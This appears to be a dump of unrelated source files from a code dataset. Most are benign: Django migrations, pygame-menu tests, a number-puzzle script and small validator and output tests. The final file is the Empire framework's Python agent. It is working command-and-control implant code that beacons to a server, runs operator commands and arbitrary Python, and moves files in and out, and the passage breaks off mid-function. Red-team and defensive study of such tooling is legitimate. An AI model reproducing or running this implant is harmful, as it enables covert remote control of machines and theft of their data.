"MIT"
] | null | null | null |
# Generated by Django 2.0.1 on 2018-01-28 04:36
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0004_auto_20180128_1003'),
]
operations = [
migrations.AlterField(
model_name='letter',
name='subject',
field=models.CharField(max_length=100),
),
]
| 21.277778
| 51
| 0.597911
|
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0004_auto_20180128_1003'),
]
operations = [
migrations.AlterField(
model_name='letter',
name='subject',
field=models.CharField(max_length=100),
),
]
| true
| true
|
f707a45e451d301022f927dfec70269a0d257c04
| 5,578
|
py
|
Python
|
test/test_selection.py
|
arpruss/pygame-menu
|
25cefb5cfc60383544d704b83a32d43dfc621c23
|
[
"MIT"
] | null | null | null |
test/test_selection.py
|
arpruss/pygame-menu
|
25cefb5cfc60383544d704b83a32d43dfc621c23
|
[
"MIT"
] | null | null | null |
test/test_selection.py
|
arpruss/pygame-menu
|
25cefb5cfc60383544d704b83a32d43dfc621c23
|
[
"MIT"
] | null | null | null |
"""
pygame-menu
https://github.com/ppizarror/pygame-menu
TEST WIDGET SELECTION.
Test widget selection effects.
License:
-------------------------------------------------------------------------------
The MIT License (MIT)
Copyright 2017-2021 Pablo Pizarro R. @ppizarror
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software
is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-------------------------------------------------------------------------------
"""
__all__ = ['SelectionTest']
from test._utils import MenuUtils, surface
import copy
import unittest
from pygame_menu.widgets import Button
from pygame_menu.widgets.selection import LeftArrowSelection, RightArrowSelection, \
HighlightSelection, NoneSelection, SimpleSelection
from pygame_menu.widgets.core.selection import Selection
from pygame_menu.widgets.selection.arrow_selection import ArrowSelection
class SelectionTest(unittest.TestCase):
def setUp(self) -> None:
"""
Setup sound engine.
"""
self.menu = MenuUtils.generic_menu()
self.menu.enable()
def test_copy(self) -> None:
"""
Test copy.
"""
s = LeftArrowSelection()
s1 = copy.copy(s)
s2 = copy.deepcopy(s)
s3 = s.copy()
self.assertNotEqual(s, s1)
self.assertNotEqual(s, s2)
self.assertNotEqual(s, s3)
def test_abstracts(self) -> None:
"""
Test abstract objects errors.
"""
w = Button('epic')
# Create abstract selection object
sel = Selection(0, 0, 0, 0)
self.assertRaises(NotImplementedError, lambda: sel.draw(surface, w))
# Create abstract arrow selection
arrow = ArrowSelection(0, 0, 0, 0)
self.assertRaises(NotImplementedError, lambda: arrow.draw(surface, w))
def test_arrow(self) -> None:
"""
Test arrow selection.
"""
w = Button('epic')
w.set_selection_effect(LeftArrowSelection())
self.menu.add.generic_widget(w)
self.menu.draw(surface)
w.set_selection_effect(RightArrowSelection())
self.menu.draw(surface)
# Create abstract arrow selection
arrow = ArrowSelection(0, 0, 0, 0)
self.assertRaises(NotImplementedError, lambda: arrow.draw(surface, w))
def test_highlight(self) -> None:
"""
Test highlight selection.
"""
w = Button('epic')
border_width = 1
margin_x = 18
margin_y = 10
w.set_selection_effect(HighlightSelection(
border_width=border_width,
margin_x=margin_x,
margin_y=margin_y
))
self.menu.add.generic_widget(w)
self.menu.draw(surface)
# noinspection PyTypeChecker
sel: 'HighlightSelection' = w.get_selection_effect()
self.assertEqual(sel.get_height(), margin_y)
self.assertEqual(sel.get_width(), margin_x)
# Test inflate
rect = w.get_rect()
inflate_rect = sel.inflate(rect)
self.assertEqual(-inflate_rect.x + rect.x, sel.get_width() / 2)
self.assertEqual(-inflate_rect.y + rect.y, sel.get_height() / 2)
# Test margin xy
sel.margin_xy(10, 20)
self.assertEqual(sel.margin_left, 10)
self.assertEqual(sel.margin_right, 10)
self.assertEqual(sel.margin_top, 20)
self.assertEqual(sel.margin_bottom, 20)
# Test null border
sel._border_width = 0
sel.draw(surface, w)
def test_none(self) -> None:
"""
Test none selection.
"""
w = Button('epic')
w.set_selection_effect(NoneSelection())
self.menu.add.generic_widget(w)
self.menu.draw(surface)
rect = w.get_rect()
new_rect = w.get_selection_effect().inflate(rect)
self.assertTrue(rect == new_rect)
self.assertFalse(w.get_selection_effect().widget_apply_font_color)
# Widgets default selection effect is None
last_selection = w.get_selection_effect()
w.set_selection_effect()
self.assertIsInstance(w.get_selection_effect(), NoneSelection)
self.assertNotEqual(w.get_selection_effect(), last_selection)
def test_simple(self) -> None:
"""
Test simple selection.
"""
w = Button('epic')
w.set_selection_effect(SimpleSelection())
self.menu.add.generic_widget(w)
self.menu.draw(surface)
rect = w.get_rect()
new_rect = w.get_selection_effect().inflate(rect)
self.assertTrue(rect == new_rect)
self.assertTrue(w.get_selection_effect().widget_apply_font_color)
| 33.401198
| 84
| 0.644676
|
__all__ = ['SelectionTest']
from test._utils import MenuUtils, surface
import copy
import unittest
from pygame_menu.widgets import Button
from pygame_menu.widgets.selection import LeftArrowSelection, RightArrowSelection, \
HighlightSelection, NoneSelection, SimpleSelection
from pygame_menu.widgets.core.selection import Selection
from pygame_menu.widgets.selection.arrow_selection import ArrowSelection
class SelectionTest(unittest.TestCase):
def setUp(self) -> None:
self.menu = MenuUtils.generic_menu()
self.menu.enable()
def test_copy(self) -> None:
s = LeftArrowSelection()
s1 = copy.copy(s)
s2 = copy.deepcopy(s)
s3 = s.copy()
self.assertNotEqual(s, s1)
self.assertNotEqual(s, s2)
self.assertNotEqual(s, s3)
def test_abstracts(self) -> None:
w = Button('epic')
sel = Selection(0, 0, 0, 0)
self.assertRaises(NotImplementedError, lambda: sel.draw(surface, w))
arrow = ArrowSelection(0, 0, 0, 0)
self.assertRaises(NotImplementedError, lambda: arrow.draw(surface, w))
def test_arrow(self) -> None:
w = Button('epic')
w.set_selection_effect(LeftArrowSelection())
self.menu.add.generic_widget(w)
self.menu.draw(surface)
w.set_selection_effect(RightArrowSelection())
self.menu.draw(surface)
arrow = ArrowSelection(0, 0, 0, 0)
self.assertRaises(NotImplementedError, lambda: arrow.draw(surface, w))
def test_highlight(self) -> None:
w = Button('epic')
border_width = 1
margin_x = 18
margin_y = 10
w.set_selection_effect(HighlightSelection(
border_width=border_width,
margin_x=margin_x,
margin_y=margin_y
))
self.menu.add.generic_widget(w)
self.menu.draw(surface)
sel: 'HighlightSelection' = w.get_selection_effect()
self.assertEqual(sel.get_height(), margin_y)
self.assertEqual(sel.get_width(), margin_x)
rect = w.get_rect()
inflate_rect = sel.inflate(rect)
self.assertEqual(-inflate_rect.x + rect.x, sel.get_width() / 2)
self.assertEqual(-inflate_rect.y + rect.y, sel.get_height() / 2)
sel.margin_xy(10, 20)
self.assertEqual(sel.margin_left, 10)
self.assertEqual(sel.margin_right, 10)
self.assertEqual(sel.margin_top, 20)
self.assertEqual(sel.margin_bottom, 20)
sel._border_width = 0
sel.draw(surface, w)
def test_none(self) -> None:
w = Button('epic')
w.set_selection_effect(NoneSelection())
self.menu.add.generic_widget(w)
self.menu.draw(surface)
rect = w.get_rect()
new_rect = w.get_selection_effect().inflate(rect)
self.assertTrue(rect == new_rect)
self.assertFalse(w.get_selection_effect().widget_apply_font_color)
last_selection = w.get_selection_effect()
w.set_selection_effect()
self.assertIsInstance(w.get_selection_effect(), NoneSelection)
self.assertNotEqual(w.get_selection_effect(), last_selection)
def test_simple(self) -> None:
w = Button('epic')
w.set_selection_effect(SimpleSelection())
self.menu.add.generic_widget(w)
self.menu.draw(surface)
rect = w.get_rect()
new_rect = w.get_selection_effect().inflate(rect)
self.assertTrue(rect == new_rect)
self.assertTrue(w.get_selection_effect().widget_apply_font_color)
| true
| true
|
f707a49d416f27b0ecff72b18c4680093e2c3895
| 206
|
py
|
Python
|
Armstrong.py
|
arelemegha/python-programs
|
c9af116c0db45dcd13d97e80a32733df372fe2d4
|
[
"CC0-1.0"
] | null | null | null |
Armstrong.py
|
arelemegha/python-programs
|
c9af116c0db45dcd13d97e80a32733df372fe2d4
|
[
"CC0-1.0"
] | null | null | null |
Armstrong.py
|
arelemegha/python-programs
|
c9af116c0db45dcd13d97e80a32733df372fe2d4
|
[
"CC0-1.0"
] | null | null | null |
n = int(input("Enter a number : "))
s = 0
num =n
while(n>0):
r = n % 10
s = s + r* r* r
n = n//10
if(s==num):
print("The number is Armstrong")
else:
print("The number is not Armstrong")
| 17.166667
| 40
| 0.533981
|
n = int(input("Enter a number : "))
s = 0
num =n
while(n>0):
r = n % 10
s = s + r* r* r
n = n//10
if(s==num):
print("The number is Armstrong")
else:
print("The number is not Armstrong")
| true
| true
|
f707a737e553def25058f11a5331e623cb147c67
| 406
|
py
|
Python
|
websites/migrations/0017_rename_filepath.py
|
mitodl/ocw-studio
|
949f96ec0647064f8d495ebdd22d66eea7d024a5
|
[
"BSD-3-Clause"
] | 2
|
2020-08-07T15:55:41.000Z
|
2021-08-16T18:28:09.000Z
|
websites/migrations/0017_rename_filepath.py
|
mitodl/ocw-studio
|
949f96ec0647064f8d495ebdd22d66eea7d024a5
|
[
"BSD-3-Clause"
] | 924
|
2020-08-10T17:54:19.000Z
|
2022-03-31T21:15:17.000Z
|
websites/migrations/0017_rename_filepath.py
|
mitodl/ocw-studio
|
949f96ec0647064f8d495ebdd22d66eea7d024a5
|
[
"BSD-3-Clause"
] | null | null | null |
# Generated by Django 3.1.6 on 2021-04-14 15:18
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("websites", "0016_remove_site_content_type_constraint"),
]
operations = [
migrations.RenameField(
model_name="websitecontent",
old_name="hugo_filepath",
new_name="content_filepath",
),
]
| 21.368421
| 65
| 0.628079
|
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("websites", "0016_remove_site_content_type_constraint"),
]
operations = [
migrations.RenameField(
model_name="websitecontent",
old_name="hugo_filepath",
new_name="content_filepath",
),
]
| true
| true
|
f707a7429d8663d95daeaa86cc6106e5370fc538
| 334
|
py
|
Python
|
toolkit/visualization/draw_utils.py
|
airium/pysot
|
c34158ba7b4a9b73938320e0019b61e6460537fc
|
[
"Apache-2.0"
] | null | null | null |
toolkit/visualization/draw_utils.py
|
airium/pysot
|
c34158ba7b4a9b73938320e0019b61e6460537fc
|
[
"Apache-2.0"
] | null | null | null |
toolkit/visualization/draw_utils.py
|
airium/pysot
|
c34158ba7b4a9b73938320e0019b61e6460537fc
|
[
"Apache-2.0"
] | null | null | null |
COLOR = ((1, 0, 0), (0, 1, 0), (1, 0, 1), (1, 1, 0), (0, 162 / 255, 232 / 255), (0.5, 0.5, 0.5), (0, 0, 1), (0, 1, 1),
(136 / 255, 0, 21 / 255), (255 / 255, 127 / 255, 39 / 255), (0, 0, 0))
LINE_STYLE = ['-', '--', ':', '-', '--', ':', '-', '--', ':', '-']
MARKER_STYLE = ['o', 'v', '<', '*', 'D', 'x', '.', 'x', '<', '.']
| 47.714286
| 118
| 0.302395
|
COLOR = ((1, 0, 0), (0, 1, 0), (1, 0, 1), (1, 1, 0), (0, 162 / 255, 232 / 255), (0.5, 0.5, 0.5), (0, 0, 1), (0, 1, 1),
(136 / 255, 0, 21 / 255), (255 / 255, 127 / 255, 39 / 255), (0, 0, 0))
LINE_STYLE = ['-', '--', ':', '-', '--', ':', '-', '--', ':', '-']
MARKER_STYLE = ['o', 'v', '<', '*', 'D', 'x', '.', 'x', '<', '.']
| true
| true
|
f707a796c39cbd67c8af787b6b9a266f5e4f040b
| 2,578
|
py
|
Python
|
tests/test_validator_create.py
|
VariantEffect/fqfa
|
f99e96009a05a24ca6aabbf9e04d3cf87fe00cb4
|
[
"BSD-3-Clause"
] | 2
|
2019-12-24T06:53:57.000Z
|
2020-01-15T21:06:24.000Z
|
tests/test_validator_create.py
|
VariantEffect/fqfa
|
f99e96009a05a24ca6aabbf9e04d3cf87fe00cb4
|
[
"BSD-3-Clause"
] | 3
|
2020-01-23T03:34:47.000Z
|
2020-02-20T10:22:23.000Z
|
tests/test_validator_create.py
|
VariantEffect/fqfa
|
f99e96009a05a24ca6aabbf9e04d3cf87fe00cb4
|
[
"BSD-3-Clause"
] | 2
|
2020-02-11T23:39:11.000Z
|
2020-03-28T22:00:24.000Z
|
import unittest
from fqfa.validator.create import create_validator
class TestCreateValidator(unittest.TestCase):
def test_create_from_string(self) -> None:
# case sensitive
validator = create_validator("ACGT")
# test valid strings
self.assertIsNotNone(validator("ACGT"))
self.assertIsNotNone(validator("AAAAAAA"))
# test invalid strings
self.assertIsNone(validator("acgt"))
self.assertIsNone(validator("AAAAAAa"))
self.assertIsNone(validator(""))
self.assertIsNone(validator("123"))
self.assertIsNone(validator("AAAA AAA"))
# case insensitive
validator = create_validator("ACGT", case_sensitive=False)
# test valid strings
self.assertIsNotNone(validator("ACGT"))
self.assertIsNotNone(validator("AAAAAAA"))
self.assertIsNotNone(validator("acgt"))
self.assertIsNotNone(validator("AAAAAAa"))
# test invalid strings
self.assertIsNone(validator(""))
self.assertIsNone(validator("123"))
self.assertIsNone(validator("AAAA AAA"))
def test_create_from_list(self) -> None:
# case sensitive
validator = create_validator(list("ACGT"))
# test valid strings
self.assertIsNotNone(validator("ACGT"))
self.assertIsNotNone(validator("AAAAAAA"))
# test invalid strings
self.assertIsNone(validator("acgt"))
self.assertIsNone(validator("AAAAAAa"))
self.assertIsNone(validator(""))
self.assertIsNone(validator("123"))
self.assertIsNone(validator("AAAA AAA"))
# case insensitive
validator = create_validator(list("ACGT"), case_sensitive=False)
# test valid strings
self.assertIsNotNone(validator("ACGT"))
self.assertIsNotNone(validator("AAAAAAA"))
self.assertIsNotNone(validator("acgt"))
self.assertIsNotNone(validator("AAAAAAa"))
# test invalid strings
self.assertIsNone(validator(""))
self.assertIsNone(validator("123"))
self.assertIsNone(validator("AAAA AAA"))
# invalid list arguments
self.assertRaises(ValueError, create_validator, ["A", "C", "GT"])
self.assertRaises(
ValueError, create_validator, ["A", "C", "GT"], case_sensitive=False
)
self.assertRaises(ValueError, create_validator, ["A", "C", ""])
self.assertRaises(
ValueError, create_validator, ["A", "C", ""], case_sensitive=False
)
if __name__ == "__main__":
unittest.main()
| 33.051282
| 80
| 0.640419
|
import unittest
from fqfa.validator.create import create_validator
class TestCreateValidator(unittest.TestCase):
def test_create_from_string(self) -> None:
validator = create_validator("ACGT")
self.assertIsNotNone(validator("ACGT"))
self.assertIsNotNone(validator("AAAAAAA"))
self.assertIsNone(validator("acgt"))
self.assertIsNone(validator("AAAAAAa"))
self.assertIsNone(validator(""))
self.assertIsNone(validator("123"))
self.assertIsNone(validator("AAAA AAA"))
validator = create_validator("ACGT", case_sensitive=False)
self.assertIsNotNone(validator("ACGT"))
self.assertIsNotNone(validator("AAAAAAA"))
self.assertIsNotNone(validator("acgt"))
self.assertIsNotNone(validator("AAAAAAa"))
self.assertIsNone(validator(""))
self.assertIsNone(validator("123"))
self.assertIsNone(validator("AAAA AAA"))
def test_create_from_list(self) -> None:
validator = create_validator(list("ACGT"))
self.assertIsNotNone(validator("ACGT"))
self.assertIsNotNone(validator("AAAAAAA"))
self.assertIsNone(validator("acgt"))
self.assertIsNone(validator("AAAAAAa"))
self.assertIsNone(validator(""))
self.assertIsNone(validator("123"))
self.assertIsNone(validator("AAAA AAA"))
validator = create_validator(list("ACGT"), case_sensitive=False)
self.assertIsNotNone(validator("ACGT"))
self.assertIsNotNone(validator("AAAAAAA"))
self.assertIsNotNone(validator("acgt"))
self.assertIsNotNone(validator("AAAAAAa"))
self.assertIsNone(validator(""))
self.assertIsNone(validator("123"))
self.assertIsNone(validator("AAAA AAA"))
self.assertRaises(ValueError, create_validator, ["A", "C", "GT"])
self.assertRaises(
ValueError, create_validator, ["A", "C", "GT"], case_sensitive=False
)
self.assertRaises(ValueError, create_validator, ["A", "C", ""])
self.assertRaises(
ValueError, create_validator, ["A", "C", ""], case_sensitive=False
)
if __name__ == "__main__":
unittest.main()
| true
| true
|
f707a803b8253bc035a491d4c9d83e52765edaa4
| 1,204
|
py
|
Python
|
rpip/tests/test_output.py
|
danielfrg/remote-pip
|
1635388edb9215c811ab7632769a2b56f464c55b
|
[
"Apache-2.0"
] | 5
|
2015-10-28T06:30:55.000Z
|
2022-03-09T07:05:26.000Z
|
rpip/tests/test_output.py
|
danielfrg/remote-pip
|
1635388edb9215c811ab7632769a2b56f464c55b
|
[
"Apache-2.0"
] | null | null | null |
rpip/tests/test_output.py
|
danielfrg/remote-pip
|
1635388edb9215c811ab7632769a2b56f464c55b
|
[
"Apache-2.0"
] | 1
|
2019-11-02T16:39:32.000Z
|
2019-11-02T16:39:32.000Z
|
from rpip.output import Output
exit0 = {'exit_code': 0, 'stdout': 'yes', 'stderr': ''}
exit1 = {'exit_code': 1, 'stdout': '', 'stderr': 'ERROR'}
o0 = {'host1': exit0, 'host2': exit0, 'host3': exit0}
o1 = {'host1': exit0, 'host2': exit1, 'host3': exit0}
o2 = {'host1': exit0, 'host2': exit1, 'host3': exit1}
def test_groupby():
o = Output(o0)
groups = o.groupby()
assert len(groups) == 1
nodes, output = groups[0]
assert len(nodes) == 3
assert nodes == ['host3', 'host2', 'host1']
assert output == exit0
def test_groupby2():
o = Output(o1)
groups = o.groupby()
assert len(groups) == 2
nodes, output = groups[0]
assert len(nodes) == 2
assert nodes == ['host3', 'host1']
assert output == exit0
nodes, output = groups[1]
assert len(nodes) == 1
assert nodes == ['host2']
assert output == exit1
def test_groupby3():
o = Output(o2)
groups = o.groupby()
assert len(groups) == 2
nodes, output = groups[0]
assert len(nodes) == 2
assert nodes == ['host3', 'host2']
assert output == exit1
nodes, output = groups[1]
assert len(nodes) == 1
assert nodes == ['host1']
assert output == exit0
| 23.153846
| 57
| 0.579734
|
from rpip.output import Output
exit0 = {'exit_code': 0, 'stdout': 'yes', 'stderr': ''}
exit1 = {'exit_code': 1, 'stdout': '', 'stderr': 'ERROR'}
o0 = {'host1': exit0, 'host2': exit0, 'host3': exit0}
o1 = {'host1': exit0, 'host2': exit1, 'host3': exit0}
o2 = {'host1': exit0, 'host2': exit1, 'host3': exit1}
def test_groupby():
o = Output(o0)
groups = o.groupby()
assert len(groups) == 1
nodes, output = groups[0]
assert len(nodes) == 3
assert nodes == ['host3', 'host2', 'host1']
assert output == exit0
def test_groupby2():
o = Output(o1)
groups = o.groupby()
assert len(groups) == 2
nodes, output = groups[0]
assert len(nodes) == 2
assert nodes == ['host3', 'host1']
assert output == exit0
nodes, output = groups[1]
assert len(nodes) == 1
assert nodes == ['host2']
assert output == exit1
def test_groupby3():
o = Output(o2)
groups = o.groupby()
assert len(groups) == 2
nodes, output = groups[0]
assert len(nodes) == 2
assert nodes == ['host3', 'host2']
assert output == exit1
nodes, output = groups[1]
assert len(nodes) == 1
assert nodes == ['host1']
assert output == exit0
| true
| true
|
f707a8765e9180ae397c0300f2561d2885361426
| 37,219
|
py
|
Python
|
empire/server/data/agent/agent.py
|
joewildiml/Empire
|
d60f36d10c674b51dd60f63efe3b1ae007d5933e
|
[
"BSD-3-Clause"
] | 1
|
2022-02-03T20:01:56.000Z
|
2022-02-03T20:01:56.000Z
|
empire/server/data/agent/agent.py
|
joewildiml/Empire
|
d60f36d10c674b51dd60f63efe3b1ae007d5933e
|
[
"BSD-3-Clause"
] | null | null | null |
empire/server/data/agent/agent.py
|
joewildiml/Empire
|
d60f36d10c674b51dd60f63efe3b1ae007d5933e
|
[
"BSD-3-Clause"
] | null | null | null |
import json
import struct
import base64
import subprocess
import random
import time
import datetime
import os
import sys
import zlib
import threading
import http.server
import zipfile
import io
import types
import re
import shutil
import pwd
import socket
import math
import stat
import grp
import numbers
from os.path import expanduser
from io import StringIO
from threading import Thread
################################################
#
# agent configuration information
#
################################################
# print "starting agent"
# profile format ->
# tasking uris | user agent | additional header 1 | additional header 2 | ...
profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
if server.endswith("/"): server = server[0:-1]
delay = 60
jitter = 0.0
lostLimit = 60
missedCheckins = 0
jobMessageBuffer = ''
currentListenerName = ""
sendMsgFuncCode = ""
proxy_list = []
# killDate form -> "MO/DAY/YEAR"
killDate = 'REPLACE_KILLDATE'
# workingHours form -> "9:00-17:00"
workingHours = 'REPLACE_WORKINGHOURS'
parts = profile.split('|')
taskURIs = parts[0].split(',')
userAgent = parts[1]
headersRaw = parts[2:]
defaultResponse = base64.b64decode("")
jobs = []
moduleRepo = {}
_meta_cache = {}
# global header dictionary
# sessionID is set by stager.py
# headers = {'User-Agent': userAgent, "Cookie": "SESSIONID=%s" %(sessionID)}
headers = {'User-Agent': userAgent}
# parse the headers into the global header dictionary
for headerRaw in headersRaw:
try:
headerKey = headerRaw.split(":")[0]
headerValue = headerRaw.split(":")[1]
if headerKey.lower() == "cookie":
headers['Cookie'] = "%s;%s" % (headers['Cookie'], headerValue)
else:
headers[headerKey] = headerValue
except:
pass
################################################
#
# communication methods
#
################################################
REPLACE_COMMS
################################################
#
# encryption methods
#
################################################
def decode_routing_packet(data):
"""
Parse ALL routing packets and only process the ones applicable
to this agent.
"""
# returns {sessionID : (language, meta, additional, [encData]), ...}
packets = parse_routing_packet(stagingKey, data)
if packets is None:
return
for agentID, packet in packets.items():
if agentID == sessionID:
(language, meta, additional, encData) = packet
# if meta == 'SERVER_RESPONSE':
process_tasking(encData)
else:
# TODO: how to handle forwarding on other agent routing packets?
pass
def build_response_packet(taskingID, packetData, resultID=0):
"""
Build a task packet for an agent.
[2 bytes] - type
[2 bytes] - total # of packets
[2 bytes] - packet #
[2 bytes] - task/result ID
[4 bytes] - length
[X...] - result data
+------+--------------------+----------+---------+--------+-----------+
| Type | total # of packets | packet # | task ID | Length | task data |
+------+--------------------+--------------------+--------+-----------+
| 2 | 2 | 2 | 2 | 4 | <Length> |
+------+--------------------+----------+---------+--------+-----------+
"""
packetType = struct.pack('=H', taskingID)
totalPacket = struct.pack('=H', 1)
packetNum = struct.pack('=H', 1)
resultID = struct.pack('=H', resultID)
if packetData:
if (isinstance(packetData, str)):
packetData = base64.b64encode(packetData.encode('utf-8', 'ignore'))
else:
packetData = base64.b64encode(packetData.decode('utf-8').encode('utf-8', 'ignore'))
if len(packetData) % 4:
packetData += '=' * (4 - len(packetData) % 4)
length = struct.pack('=L', len(packetData))
return packetType + totalPacket + packetNum + resultID + length + packetData
else:
length = struct.pack('=L', 0)
return packetType + totalPacket + packetNum + resultID + length
def parse_task_packet(packet, offset=0):
"""
Parse a result packet-
[2 bytes] - type
[2 bytes] - total # of packets
[2 bytes] - packet #
[2 bytes] - task/result ID
[4 bytes] - length
[X...] - result data
+------+--------------------+----------+---------+--------+-----------+
| Type | total # of packets | packet # | task ID | Length | task data |
+------+--------------------+--------------------+--------+-----------+
| 2 | 2 | 2 | 2 | 4 | <Length> |
+------+--------------------+----------+---------+--------+-----------+
Returns a tuple with (responseName, length, data, remainingData)
Returns a tuple with (responseName, totalPackets, packetNum, resultID, length, data, remainingData)
"""
try:
packetType = struct.unpack('=H', packet[0 + offset:2 + offset])[0]
totalPacket = struct.unpack('=H', packet[2 + offset:4 + offset])[0]
packetNum = struct.unpack('=H', packet[4 + offset:6 + offset])[0]
resultID = struct.unpack('=H', packet[6 + offset:8 + offset])[0]
length = struct.unpack('=L', packet[8 + offset:12 + offset])[0]
packetData = packet[12 + offset:12 + offset + length].decode('UTF-8')
remainingData = packet[12 + offset + length:].decode('UTF-8')
return (packetType, totalPacket, packetNum, resultID, length, packetData, remainingData)
except Exception as e:
print("parse_task_packet exception:", e)
return (None, None, None, None, None, None, None)
def process_tasking(data):
# processes an encrypted data packet
# -decrypts/verifies the response to get
# -extracts the packets and processes each
try:
# aes_decrypt_and_verify is in stager.py
tasking = aes_decrypt_and_verify(key, data).encode('UTF-8')
(packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking)
# if we get to this point, we have a legit tasking so reset missedCheckins
missedCheckins = 0
# execute/process the packets and get any response
resultPackets = ""
result = process_packet(packetType, data, resultID)
if result:
resultPackets += result
packetOffset = 12 + length
while remainingData and remainingData != '':
(packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking,
offset=packetOffset)
result = process_packet(packetType, data, resultID)
if result:
resultPackets += result
packetOffset += 12 + length
# send_message() is patched in from the listener module
send_message(resultPackets)
except Exception as e:
# print "processTasking exception:",e
pass
def process_job_tasking(result):
# process job data packets
# - returns to the C2
# execute/process the packets and get any response
try:
resultPackets = b""
if result:
resultPackets += result
# send packets
send_message(resultPackets)
except Exception as e:
print("processJobTasking exception:", e)
pass
def process_packet(packetType, data, resultID):
try:
packetType = int(packetType)
except Exception as e:
return None
if packetType == 1:
# sysinfo request
# get_sysinfo should be exposed from stager.py
send_message(build_response_packet(1, get_sysinfo(), resultID))
elif packetType == 2:
# agent exit
send_message(build_response_packet(2, "", resultID))
agent_exit()
elif packetType == 34:
proxy_list = json.loads(data)
update_proxychain(proxy_list)
elif packetType == 40:
# run a command
parts = data.split(" ")
if len(parts) == 1:
data = parts[0]
resultData = str(run_command(data))
send_message(build_response_packet(40, resultData, resultID))
else:
cmd = parts[0]
cmdargs = ' '.join(parts[1:len(parts)])
resultData = str(run_command(cmd, cmdargs=cmdargs))
send_message(build_response_packet(40, resultData, resultID))
elif packetType == 41:
# file download
objPath = os.path.abspath(data)
fileList = []
if not os.path.exists(objPath):
send_message(build_response_packet(40, "file does not exist or cannot be accessed", resultID))
if not os.path.isdir(objPath):
fileList.append(objPath)
else:
# recursive dir listing
for folder, subs, files in os.walk(objPath):
for filename in files:
# dont care about symlinks
if os.path.exists(objPath):
fileList.append(objPath + "/" + filename)
for filePath in fileList:
offset = 0
size = os.path.getsize(filePath)
partIndex = 0
while True:
# get 512kb of the given file starting at the specified offset
encodedPart = get_file_part(filePath, offset=offset, base64=False)
c = compress()
start_crc32 = c.crc32_data(encodedPart)
comp_data = c.comp_data(encodedPart)
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart).decode('UTF-8')
partData = "%s|%s|%s|%s" % (partIndex, filePath, size, encodedPart)
if not encodedPart or encodedPart == '' or len(encodedPart) == 16:
break
send_message(build_response_packet(41, partData, resultID))
global delay
global jitter
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = old_div(1, jitter)
minSleep = int((1.0 - jitter) * delay)
maxSleep = int((1.0 + jitter) * delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
partIndex += 1
offset += 512000
elif packetType == 42:
# file upload
try:
parts = data.split("|")
filePath = parts[0]
base64part = parts[1]
raw = base64.b64decode(base64part)
with open(filePath, 'ab') as f:
f.write(raw)
send_message(build_response_packet(42, "[*] Upload of %s successful" % (filePath), resultID))
except Exception as e:
send_message(build_response_packet(0, "[!] Error in writing file %s during upload: %s" % (filePath, str(e)), resultID))
elif packetType == 43:
# directory list
cmdargs = data
path = '/' # default to root
if cmdargs is not None and cmdargs != '' and cmdargs != '/': # strip trailing slash for uniformity
path = cmdargs.rstrip('/')
if path[0] != '/': # always scan relative to root for uniformity
path = '/{0}'.format(path)
if not os.path.isdir(path):
send_message(build_response_packet(43, 'Directory {} not found.'.format(path), resultID))
items = []
with os.scandir(path) as it:
for entry in it:
items.append({'path': entry.path, 'name': entry.name, 'is_file': entry.is_file()})
result_data = json.dumps({
'directory_name': path if len(path) == 1 else path.split('/')[-1],
'directory_path': path,
'items': items
})
send_message(build_response_packet(43, result_data, resultID))
elif packetType == 50:
# return the currently running jobs
msg = ""
if len(jobs) == 0:
msg = "No active jobs"
else:
msg = "Active jobs:\n"
for x in range(len(jobs)):
msg += "\t%s" % (x)
send_message(build_response_packet(50, msg, resultID))
elif packetType == 51:
# stop and remove a specified job if it's running
try:
# Calling join first seems to hang
# result = jobs[int(data)].join()
send_message(build_response_packet(0, "[*] Attempting to stop job thread", resultID))
result = jobs[int(data)].kill()
send_message(build_response_packet(0, "[*] Job thread stoped!", resultID))
jobs[int(data)]._Thread__stop()
jobs.pop(int(data))
if result and result != "":
send_message(build_response_packet(51, result, resultID))
except:
return build_response_packet(0, "error stopping job: %s" % (data), resultID)
elif packetType == 100:
# dynamic code execution, wait for output, don't save outputPicl
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
results = buffer.getvalue()
send_message(build_response_packet(100, str(results), resultID))
except Exception as e:
errorData = str(buffer.getvalue())
return build_response_packet(0, "error executing specified Python data: %s \nBuffer data recovered:\n%s" % (
e, errorData), resultID)
elif packetType == 101:
# dynamic code execution, wait for output, save output
prefix = data[0:15].strip()
extension = data[15:20].strip()
data = data[20:]
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
results = buffer.getvalue().encode('latin-1')
c = compress()
start_crc32 = c.crc32_data(results)
comp_data = c.comp_data(results)
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart).decode('UTF-8')
send_message(
